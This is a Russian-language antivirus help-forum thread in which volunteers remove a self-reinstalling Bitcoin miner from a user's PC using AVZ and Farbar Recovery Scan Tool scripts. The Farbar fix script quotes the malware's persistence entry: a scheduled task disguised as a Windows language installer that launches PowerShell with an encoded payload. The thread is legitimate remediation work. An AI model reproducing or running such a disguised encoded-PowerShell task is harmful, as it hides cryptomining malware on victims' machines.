Майнер на компьютере удалял неоднократно, заного скачивает себя не могу понять какой процесс скачивает майнер.
Пытался смотреть что скачивает процесс пока только ищу через диспейчер и закрываю и удаляю процесс пожалуйста помогитеВложение 681724
Майнер на компьютере удалял неоднократно, заного скачивает себя не могу понять какой процесс скачивает майнер.
Пытался смотреть что скачивает процесс пока только ищу через диспейчер и закрываю и удаляю процесс пожалуйста помогитеВложение 681724
Уважаемый(ая) Usein, спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
![]()
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Вот лог
- - - - -Добавлено - - - - -
Сделал свежий лог
Выполните скрипт в AVZ из папки Autologger
Код:begin ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.'); ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); if not IsWOW64 then begin SearchRootkit(true, true); SetAVZGuardStatus(True); end; TerminateProcessByName('c:\programdata\windows\dlchosts.exe'); QuarantineFile('c:\programdata\windows\dlchosts.exe',''); DeleteFile('c:\programdata\windows\dlchosts.exe','32'); BC_ImportAll; ExecuteSysClean; BC_Activate; RebootWindows(false); end.
- Обратите внимание: будет выполнена перезагрузка компьютера.
Выполните скрипт в AVZ
c:\quarantine.zip пришлите по красной ссылке Прислать запрошенный карантин над первым сообщением темы.Код:begin CreateQurantineArchive('c:\quarantine.zip'); end.
Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Я на время архивировал те файлы, но перед скриптом вернул на место что бы скрипт сработал.
Архивировал потомучто он сам себя запускал и ел ресурсы системы. Карантин отправил, логи прикрепил
- - - - -Добавлено - - - - -
Вообщем почекал гайды в инете и нашел вот такую вот папкуВложение 681765Вложение 681766
Ничего делать не стал жду ваших указаний.
Скачайте Farbar Recovery Scan Toolи сохраните на Рабочем столе.
- Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan отмечены List BCD и 90 Days Files.
3. Нажмите кнопку Scan.
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Удалил файлы из скрина 1 и 2 т.к. вы долго не отвечали и я боялся что вирус наплодит себя в других папках
1. Выделите следующий код:
2. Скопируйте выделенный текст (правая кнопка мыши – Копировать).Код:Start:: CreateRestorePoint: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION Task: {6DC09AE9-471B-412F-844A-D85F0351674A} - System32\Tasks\Microsoft\Windows\LanguageComponentsInstaller\LanguageComponentsInstaller => powershell.exe -c "$ddd = 'vGa+PrRRs1m+Co8n0EuiRrdFxxmUVdIAhByAOK1WhxeLbfhqzneTLehw83rwDbZs6w/dEN1diSvSKZMa3Uq9B4oBnAT7NdRW0F6pKOdF0xvtKNdt6XmTdKRIngmVHYxW3xThULQdkjiCB4gR2CC0T85K0DK6PdAzyDOqNbUyv0zqIdgsmwqUHI0np2iSVbcNkjqVGYUN6W68Qto/4Gn2DPhWvmT8Jrg4gi7Fd4sVljmUDP4j8BqKCpULhFXUDpFu8RzbXJYkwXyFd6dl+G7jJqAd+SenDcwJ (the data entry has 2566 more characters). ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> No File ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> No File ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> No File ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> No File ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> No File ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> No File ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> No File ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> No File ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> No File ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> No File ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> No File ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> No File ShellIconOverlayIdentifiers-x32: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> No File ShellIconOverlayIdentifiers-x32: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> No File ContextMenuHandlers1: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => -> No File AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [236] AlternateDataStreams: C:\Users\админ\Application Data:00e481b5e22dbe1f649fcddd505d3eb7 [394] AlternateDataStreams: C:\Users\админ\Desktop\Рисунок (27).jpg:3or4kl4x13tuuug3Byamue2s4b [93] AlternateDataStreams: C:\Users\админ\Desktop\Рисунок (27).jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0] AlternateDataStreams: C:\Users\админ\Desktop\справка.jpeg:3or4kl4x13tuuug3Byamue2s4b [93] AlternateDataStreams: C:\Users\админ\Desktop\справка.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0] AlternateDataStreams: C:\Users\админ\AppData\Roaming:00e481b5e22dbe1f649fcddd505d3eb7 [394] Reboot: End::
3. Запустите Farbar Recovery Scan Tool.
4. Нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.
- Обратите внимание: будет выполнена перезагрузка компьютера.
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Сделал все по инструкции.
Что с проблемой?
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Спасибо, все пофиксилось. Но у меня проблемы когда захожу в таск менеджер цп и жд загружены под 100% и потом медленно опускаются. Не знаю визуальный баг или что-то есть. Но признаков вируса нет думаю тему можно закрыть
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Спасибо майнеров на пк пока что не вижу система работает стабильно, заявку можно закрывать.
=D1=F2=E0=F2=E8=F1=F2=E8=EA=E0 =EF=F0=EE=E2=E5=E4=E5=ED=ED=EE=E3=EE =EB=
=E5=F7=E5=ED=E8=FF:
- =CF=EE=EB=F3=F7=E5=ED=EE =EA=E0=F0=E0=ED=F2=E8=ED=EE=E2: 1
- =CE=E1=F0=E0=E1=EE=F2=E0=ED=EE =F4=E0=E9=EB=EE=E2: 1
- =C2 =F5=EE=E4=E5 =EB=E5=F7=E5=ED=E8=FF =EE=E1=ED=E0=F0=F3=E6=E5=ED=FB=
=E2=F0=E5=E4=EE=ED=EE=F1=ED=FB=E5 =EF=F0=EE=E3=F0=E0=EC=EC=FB:
- c:\programdata\windows\dlchosts.exe - not-a-virus:HEUR:RiskT=
ool.Win32.BitCoinMiner.gen ( AVAST4: Win64:CoinminerX-gen [Trj] )
Уважаемый(ая) Usein, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.